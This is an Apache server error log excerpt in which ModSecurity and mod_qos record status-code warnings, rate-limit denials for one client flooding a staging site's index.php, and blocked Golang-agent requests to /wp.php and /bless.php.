[Tue May 26 20:00:10.310441 2026] [security2:error] [pid 106517:tid 106768] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWucIZZc2DoU1lPnP1ZJAAAAPo"]
[Tue May 26 20:00:10.311764 2026] [security2:error] [pid 106517:tid 106760] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWucIZZc2DoU1lPnP1ZHQAAAPI"]
[Tue May 26 20:00:10.316346 2026] [security2:error] [pid 106517:tid 106747] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWucIZZc2DoU1lPnP1ZMwAAAOU"]
[Tue May 26 20:00:10.338932 2026] [security2:error] [pid 106517:tid 106702] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWucIZZc2DoU1lPnP1ZKgAAALg"]
[Tue May 26 20:00:10.344752 2026] [security2:error] [pid 106517:tid 106679] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWucIZZc2DoU1lPnP1ZRwAAAKE"]
[Tue May 26 20:00:10.346471 2026] [security2:error] [pid 106517:tid 106725] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWucIZZc2DoU1lPnP1ZMgAAAM8"]
[Tue May 26 20:00:10.347755 2026] [security2:error] [pid 106517:tid 106709] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWucIZZc2DoU1lPnP1ZQAAAAL8"]
[Tue May 26 20:00:10.350780 2026] [security2:error] [pid 106517:tid 106749] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWucIZZc2DoU1lPnP1ZNAAAAOc"]
[Tue May 26 20:00:10.362522 2026] [security2:error] [pid 106517:tid 106706] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWucYZZc2DoU1lPnP1ZgAAAALw"]
[Tue May 26 20:00:10.363011 2026] [security2:error] [pid 106517:tid 106653] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWucYZZc2DoU1lPnP1ZfQAAAIg"]
[Tue May 26 20:00:10.367897 2026] [security2:error] [pid 106517:tid 106696] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWucYZZc2DoU1lPnP1ZhAAAALI"]
[Tue May 26 20:00:10.381730 2026] [security2:error] [pid 106517:tid 106719] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWucIZZc2DoU1lPnP1ZQwAAAMk"]
[Tue May 26 20:00:10.382083 2026] [security2:error] [pid 106517:tid 106753] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWucIZZc2DoU1lPnP1ZLwAAAOs"]
[Tue May 26 20:00:10.383229 2026] [security2:error] [pid 106517:tid 106744] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWucIZZc2DoU1lPnP1ZQgAAAOI"]
[Tue May 26 20:00:10.388906 2026] [security2:error] [pid 93576:tid 93821] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWucWDRMqfxdEDkosz8xAAAAG0"]
[Tue May 26 20:00:10.391896 2026] [security2:error] [pid 106517:tid 106728] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWucYZZc2DoU1lPnP1ZgQAAANI"]
[Tue May 26 20:00:10.392916 2026] [security2:error] [pid 93576:tid 93830] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWucWDRMqfxdEDkosz8yQAAAHY"]
[Tue May 26 20:00:10.407596 2026] [security2:error] [pid 93576:tid 93758] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWucWDRMqfxdEDkosz8tAAAAC4"]
[Tue May 26 20:00:10.421169 2026] [security2:error] [pid 93576:tid 93761] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWucWDRMqfxdEDkosz8zAAAADE"]
[Tue May 26 20:00:10.426234 2026] [security2:error] [pid 106517:tid 106690] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWucYZZc2DoU1lPnP1ZjAAAAKw"]
[Tue May 26 20:00:10.441713 2026] [security2:error] [pid 106517:tid 106778] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWucYZZc2DoU1lPnP1ZhQAAAQQ"]
[Tue May 26 20:00:10.444239 2026] [security2:error] [pid 106517:tid 106697] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWucYZZc2DoU1lPnP1ZmgAAALM"]
[Tue May 26 20:00:10.450836 2026] [security2:error] [pid 93576:tid 93753] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWucWDRMqfxdEDkosz8zQAAACk"]
[Tue May 26 20:00:10.483163 2026] [security2:error] [pid 106517:tid 106665] [client 103.163.220.12:51229] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp.php"] [unique_id "ahWucoZZc2DoU1lPnP1Z8QAAAJQ"]
[Tue May 26 20:00:10.541502 2026] [qos:error] [pid 93576:tid 93744] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWucmDRMqfxdEDkosz9SwAAACA
[Tue May 26 20:00:10.545741 2026] [qos:error] [pid 106517:tid 106710] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWucoZZc2DoU1lPnP1aAAAAAMA
[Tue May 26 20:00:10.549974 2026] [qos:error] [pid 106517:tid 106767] [client 45.148.10.120:57912] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWucoZZc2DoU1lPnP1aAgAAAPk
[Tue May 26 20:00:10.559259 2026] [qos:error] [pid 93576:tid 93771] [client 45.148.10.120:57882] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWucmDRMqfxdEDkosz9TgAAADs
[Tue May 26 20:00:10.562437 2026] [qos:error] [pid 93576:tid 93756] [client 45.148.10.120:57842] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWucmDRMqfxdEDkosz9TwAAACw
[Tue May 26 20:00:10.577744 2026] [qos:error] [pid 93576:tid 93830] [client 45.148.10.120:57922] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWucmDRMqfxdEDkosz9UAAAAHY
[Tue May 26 20:00:10.579481 2026] [qos:error] [pid 106517:tid 106692] [client 45.148.10.120:54226] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWucoZZc2DoU1lPnP1aAwAAAK4
[Tue May 26 20:00:10.594496 2026] [qos:error] [pid 93576:tid 93791] [client 45.148.10.120:57890] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWucmDRMqfxdEDkosz9UQAAAE8
[Tue May 26 20:00:10.602413 2026] [qos:error] [pid 93576:tid 93816] [client 45.148.10.120:57874] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWucmDRMqfxdEDkosz9UgAAAGg
[Tue May 26 20:00:10.606078 2026] [qos:error] [pid 93576:tid 93731] [client 45.148.10.120:35240] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWucmDRMqfxdEDkosz9UwAAABM
[Tue May 26 20:00:10.692830 2026] [qos:error] [pid 93576:tid 93770] [client 45.148.10.120:35314] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWucmDRMqfxdEDkosz9VwAAADo
[Tue May 26 20:00:10.696707 2026] [qos:error] [pid 93576:tid 93761] [client 45.148.10.120:57956] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWucmDRMqfxdEDkosz9WAAAADE
[Tue May 26 20:00:10.697583 2026] [qos:error] [pid 106517:tid 106728] [client 45.148.10.120:57912] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWucoZZc2DoU1lPnP1aDQAAANI
[Tue May 26 20:00:10.714915 2026] [qos:error] [pid 93576:tid 93765] [client 45.148.10.120:57882] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWucmDRMqfxdEDkosz9WQAAADU
[Tue May 26 20:00:10.722983 2026] [qos:error] [pid 93576:tid 93802] [client 45.148.10.120:57842] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWucmDRMqfxdEDkosz9WgAAAFo
[Tue May 26 20:00:10.730122 2026] [qos:error] [pid 106517:tid 106708] [client 45.148.10.120:54226] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWucoZZc2DoU1lPnP1aDgAAAL4
[Tue May 26 20:00:10.732884 2026] [qos:error] [pid 93576:tid 93759] [client 45.148.10.120:57922] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWucmDRMqfxdEDkosz9WwAAAC8
[Tue May 26 20:00:10.741799 2026] [qos:error] [pid 93576:tid 93753] [client 45.148.10.120:57890] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWucmDRMqfxdEDkosz9XAAAACk
[Tue May 26 20:00:10.760171 2026] [qos:error] [pid 93576:tid 93739] [client 45.148.10.120:35240] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWucmDRMqfxdEDkosz9XQAAABs
[Tue May 26 20:00:10.761829 2026] [qos:error] [pid 93576:tid 93838] [client 45.148.10.120:57874] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWucmDRMqfxdEDkosz9XgAAAH4
[Tue May 26 20:00:10.807365 2026] [security2:error] [pid 106517:tid 106685] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWucoZZc2DoU1lPnP1Z2QAAAKc"]
[Tue May 26 20:00:10.869072 2026] [qos:error] [pid 93576:tid 93815] [client 45.148.10.120:57882] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWucmDRMqfxdEDkosz9YwAAAGc
[Tue May 26 20:00:10.874852 2026] [qos:error] [pid 93576:tid 93799] [client 45.148.10.120:57842] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWucmDRMqfxdEDkosz9ZAAAAFc
[Tue May 26 20:00:10.881400 2026] [qos:error] [pid 106517:tid 106764] [client 45.148.10.120:54226] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWucoZZc2DoU1lPnP1aFAAAAPY
[Tue May 26 20:00:10.886309 2026] [qos:error] [pid 93576:tid 93825] [client 45.148.10.120:35314] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWucmDRMqfxdEDkosz9ZQAAAHE
[Tue May 26 20:00:10.886417 2026] [qos:error] [pid 93576:tid 93734] [client 45.148.10.120:57922] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWucmDRMqfxdEDkosz9ZgAAABY
[Tue May 26 20:00:10.891663 2026] [qos:error] [pid 93576:tid 93796] [client 45.148.10.120:57890] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWucmDRMqfxdEDkosz9ZwAAAFQ
[Tue May 26 20:00:10.982744 2026] [security2:error] [pid 93576:tid 93775] [client 103.163.220.27:30161] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/bless.php"] [unique_id "ahWucmDRMqfxdEDkosz9aQAAAD8"]
[Tue May 26 20:00:11.011088 2026] [qos:error] [pid 106517:tid 106697] [client 45.148.10.120:57912] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuc4ZZc2DoU1lPnP1aGgAAALM
[Tue May 26 20:00:11.013741 2026] [qos:error] [pid 93576:tid 93756] [client 45.148.10.120:57956] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuc2DRMqfxdEDkosz9agAAACw
[Tue May 26 20:00:11.021038 2026] [qos:error] [pid 93576:tid 93754] [client 45.148.10.120:35240] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuc2DRMqfxdEDkosz9awAAACo
[Tue May 26 20:00:11.022066 2026] [qos:error] [pid 93576:tid 93821] [client 45.148.10.120:57874] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuc2DRMqfxdEDkosz9bAAAAG0
[Tue May 26 20:00:11.026044 2026] [qos:error] [pid 93576:tid 93746] [client 45.148.10.120:57882] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuc2DRMqfxdEDkosz9bQAAACI
[Tue May 26 20:00:11.026569 2026] [qos:error] [pid 93576:tid 93790] [client 45.148.10.120:57842] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuc2DRMqfxdEDkosz9bgAAAE4
[Tue May 26 20:00:11.032511 2026] [qos:error] [pid 106517:tid 106651] [client 45.148.10.120:54226] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuc4ZZc2DoU1lPnP1aGwAAAIY
[Tue May 26 20:00:11.036449 2026] [qos:error] [pid 93576:tid 93830] [client 45.148.10.120:35314] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuc2DRMqfxdEDkosz9bwAAAHY
[Tue May 26 20:00:11.039972 2026] [qos:error] [pid 93576:tid 93791] [client 45.148.10.120:57922] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuc2DRMqfxdEDkosz9cAAAAE8
[Tue May 26 20:00:11.140810 2026] [qos:error] [pid 93576:tid 93770] [client 45.148.10.120:57890] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuc2DRMqfxdEDkosz9cgAAADo
[Tue May 26 20:00:11.161186 2026] [qos:error] [pid 106517:tid 106752] [client 45.148.10.120:57912] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuc4ZZc2DoU1lPnP1aIQAAAOo
[Tue May 26 20:00:11.167450 2026] [qos:error] [pid 93576:tid 93802] [client 45.148.10.120:57956] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuc2DRMqfxdEDkosz9cwAAAFo
[Tue May 26 20:00:11.174771 2026] [qos:error] [pid 93576:tid 93767] [client 45.148.10.120:35240] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuc2DRMqfxdEDkosz9dQAAADc
[Tue May 26 20:00:11.177105 2026] [qos:error] [pid 93576:tid 93753] [client 45.148.10.120:57874] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuc2DRMqfxdEDkosz9dgAAACk
[Tue May 26 20:00:11.178025 2026] [qos:error] [pid 93576:tid 93739] [client 45.148.10.120:57842] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuc2DRMqfxdEDkosz9dwAAABs
[Tue May 26 20:00:11.179378 2026] [qos:error] [pid 93576:tid 93838] [client 45.148.10.120:57882] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuc2DRMqfxdEDkosz9eAAAAH4
[Tue May 26 20:00:11.182962 2026] [qos:error] [pid 106517:tid 106703] [client 45.148.10.120:54226] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuc4ZZc2DoU1lPnP1aJAAAALk
[Tue May 26 20:00:11.186003 2026] [qos:error] [pid 93576:tid 93815] [client 45.148.10.120:35314] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuc2DRMqfxdEDkosz9eQAAAGc
[Tue May 26 20:00:11.193577 2026] [qos:error] [pid 93576:tid 93822] [client 45.148.10.120:57922] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuc2DRMqfxdEDkosz9egAAAG4
[Tue May 26 20:00:11.277900 2026] [security2:error] [pid 93576:tid 93774] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWucWDRMqfxdEDkosz83gAAAD4"]
[Tue May 26 20:00:11.283586 2026] [security2:error] [pid 93576:tid 93781] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWucWDRMqfxdEDkosz8ywAAAEU"]
[Tue May 26 20:00:11.296897 2026] [security2:error] [pid 93576:tid 93713] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWucWDRMqfxdEDkosz84wAAAAE"]
[Tue May 26 20:00:11.305655 2026] [security2:error] [pid 106517:tid 106717] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWucYZZc2DoU1lPnP1ZnwAAAMc"]
[Tue May 26 20:00:11.309081 2026] [security2:error] [pid 106517:tid 106732] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWucYZZc2DoU1lPnP1ZpAAAANY"]
[Tue May 26 20:00:11.313130 2026] [security2:error] [pid 106517:tid 106649] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWucYZZc2DoU1lPnP1ZmQAAAIU"]
[Tue May 26 20:00:11.315917 2026] [security2:error] [pid 93576:tid 93741] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWucWDRMqfxdEDkosz84QAAAB0"]
[Tue May 26 20:00:11.316261 2026] [security2:error] [pid 93576:tid 93737] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWucWDRMqfxdEDkosz85QAAABk"]
[Tue May 26 20:00:11.322613 2026] [security2:error] [pid 106517:tid 106656] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWucYZZc2DoU1lPnP1ZoQAAAIs"]
[Tue May 26 20:00:11.324799 2026] [security2:error] [pid 106517:tid 106705] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWucYZZc2DoU1lPnP1ZowAAALs"]
[Tue May 26 20:00:11.326893 2026] [security2:error] [pid 106517:tid 106661] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWucYZZc2DoU1lPnP1ZnAAAAJA"]
[Tue May 26 20:00:11.327490 2026] [security2:error] [pid 106517:tid 106695] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWucYZZc2DoU1lPnP1ZngAAALE"]
[Tue May 26 20:00:11.335390 2026] [security2:error] [pid 106517:tid 106736] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWucYZZc2DoU1lPnP1ZpwAAANo"]
[Tue May 26 20:00:11.343898 2026] [security2:error] [pid 106517:tid 106663] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWucYZZc2DoU1lPnP1ZqAAAAJI"]
[Tue May 26 20:00:11.346092 2026] [security2:error] [pid 106517:tid 106675] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWucYZZc2DoU1lPnP1ZpQAAAJ4"]
[Tue May 26 20:00:11.348548 2026] [security2:error] [pid 93576:tid 93743] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWucWDRMqfxdEDkosz87QAAAB8"]
[Tue May 26 20:00:11.372064 2026] [security2:error] [pid 106517:tid 106699] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWucYZZc2DoU1lPnP1ZqQAAALU"]
